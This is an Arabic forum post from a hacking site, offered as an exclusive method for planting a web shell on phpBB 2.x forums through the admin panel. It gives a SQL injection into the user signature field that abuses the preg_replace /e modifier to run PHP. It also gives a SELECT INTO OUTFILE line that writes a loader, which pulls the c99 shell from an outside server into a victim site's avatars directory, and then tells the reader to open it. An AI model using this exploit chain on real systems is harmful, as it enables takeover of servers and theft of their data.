:: vBspiders Professional Network :: - حصري [ رفع الشيل عن طريق PHPBB admin ]

السلام عليكم ورحمه الله وبركاته

مجرب على : phpBB 2.0.19 , 2.0.23

إذا كان لديك ادمين فروم phpBB ولم تستطع رفع الشيل ، إذا ألحل هنا وحصريا ...

1. تدخل على administration پانل
2. حرر ملف جديد في جهازك shell.sql وضع هذا آلكود sql

كود:

UPDATE users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:phpinfo();' WHERE user_id=YOUR_ID;

YOUR_ID هو ID بتاعك في فروم ، تقدر تستعمل 2 إلي هو تاع Admin forum

3.إذهب الى Restore Database و اعمل upload للملف shell.sql

4. إذهب الى EDIT account في forum و ليس administration پانل

Wow

يمكنك رؤية phpinfo تعمل ....

يمكنك الآن كتآبة اي كودPHP آخر لوووووووووووول

هذا آلكود لرفع الشيل :

كود:

#

# Table Data for phpbb_categories

#
 

SELECT '<?php $l=fopen("/home/local/httpd/virtual/victim_site/htdocs/forum/images/avatars/shell.php","a+") or die("Could not open file!"); fwrite($l,file_get_*******s("http://www.your_server.com/c99.php.txt"));fclose($l); ?>' INTO OUTFILE '/home/local/httpd/virtual/site_victime/htdocs/forum/images/avatars/uploder_shell.php';

http://www.your_server.com/c99.php.txt

بعد upload، تفتح الصفحة :
http://www.vicitm_site.com/forum/ima...oder_shell.php

بعدها، الصفحة shell.php تتكون دآخل آلمجلد avatars

يمكنك تغيير المسار :
/home/local/httpd/virtual/victim_site/htdocs/forum/images/avatars/shell.php

على حسب السيرفر

إفتح الصفحة لتشغيل الشيل --->

http://www.vicitm_site.com/forum/ima...tars/shell.php

وسلام